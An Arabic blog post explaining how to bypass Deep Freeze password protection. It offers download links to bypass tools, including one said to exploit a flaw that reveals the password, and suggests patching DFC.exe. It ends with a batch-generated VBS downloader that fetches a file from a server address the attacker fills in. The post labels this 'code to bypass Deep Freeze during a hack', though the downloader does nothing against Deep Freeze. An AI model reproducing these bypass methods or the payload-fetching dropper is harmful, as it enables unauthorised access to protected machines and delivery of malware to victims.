-❤️-
U3F1ZWV6ZTM1NzY5ODgxOTVfQWN0aXZhdGlvbjQwNTIyMzQ0NTY3
recent
عنوان إخباري

شرح الطرق التي يمكنك من خلالها تجاوز حماية برنامج Deep Freez

Zakariya Ayt Amran
الصفحة الرئيسية

جاوز حماية برنامج Deep Freez

ظهرت مشكلة في تخطي نافذة الباسوورد في الاصدارات الحديثة من الديب فريز واصبح معظم البرامج لا تستطيع ايقاف حالة Frozen حتي لو تخطت نافذة الباسوورد.

وبعد البحث في سبب المشكلة تبين ان الديب فريز يستخدم درايفر ويقوم البرنامج بارسال الباسوورد مشفرة بواسطة تشفير XOR بسيط مع بعض الاضافات وايضا مع اداخل الوقت والتاريخ في العملية الحسابية

ولذلك تحصل كل مرة علي هاش مختلف لن يتكرر مرة اخري. ويستقبل الدريفر البياانات باستخدام دالة DeviceIoControl
ويقوم الدريفر بتحديد اذا كانت الباسوور صحيحة ام لا ولذلك اصبح من المستحيل او من شبة المستحيل التغلب علي هذة الطريقة.

يمكنك استخدام عدة اشياء للتغلب علي هذه النقطة.



رابط التحميل 
http://www18.zippyshare.com/v/WVMNYyM5/file.html

2 - استخدام اداة meltdowndfc اداة اكثر فاعلية.... تستغل ثغرة في الديب فريز تمكنها من معرفة الباسوورد المستخدم 

رابط التحميل 
http://www26.zippyshare.com/v/lquXXS7t/file.html

3 - استخدام طريقة deep freeze command line control وهو برنامج يأتي مع الديب فريز ويسمي DFC.exe وموجود في هذا المسار:
C:\Windows\SYSTEM32\DFC.EXE

والفكرة هي تعديل هذا البرنامج بحيث يتم تخطي نافذة الباسوورد

كود تخطي الديب فريزر أثناء الاختراق


قم بحفظه بصيغه VBS
-----------------------------------------------------------------------------------------------
@echo off 
set file="ضع هناء رابط السرفر
set dlto="C:\" 
::---------------- 

if exist %temp%\dl.vbs del /q %temp%\dl.vbs 
echo HTTPDownload %file%,%dlto% >> %temp%\dl.vbs 
echo Sub HTTPDownload( myURL, myPath ) >> %temp%\dl.vbs 
echo Dim i, objFile, objFSO, objHTTP, strFile, strMsg >> %temp%\dl.vbs 
echo Const ForReading = 1, ForWriting = 2, ForAppending = 8 >> %temp%\dl.vbs 
echo Set objFSO = CreateObject( "Scripting.FileSystemObject" ) >> %temp%\dl.vbs 
echo If objFSO.FolderExists( myPath ) Then >> %temp%\dl.vbs 
echo strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev( myURL, "/" ) + 1 ) ) >> %temp%\dl.vbs 
echo ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath, "\" ) - 1 ) ) Then >> %temp%\dl.vbs 
echo strFile = myPath >> %temp%\dl.vbs 
echo Else >> %temp%\dl.vbs 
echo Exit Sub >> %temp%\dl.vbs 
echo End If >> %temp%\dl.vbs 
echo Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True ) >> %temp%\dl.vbs 
echo Set objHTTP = CreateObject( "WinHttp.WinHttpRequest.5.1" ) >> %temp%\dl.vbs 
echo objHTTP.Open "GET", myURL, False >> %temp%\dl.vbs 
echo objHTTP.Send >> %temp%\dl.vbs 
echo For i = 1 To LenB( objHTTP.ResponseBody ) >> %temp%\dl.vbs 
echo objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1 ) ) ) >> %temp%\dl.vbs
echo Next >> %temp%\dl.vbs 
echo objFile.Close( ) >> %temp%\dl.vbs 
echo End Sub >> %temp%\dl.vbs 
start %temp%\dl.vbs
-----------------------------------------------------------------------------------------------
الاسمبريد إلكترونيرسالة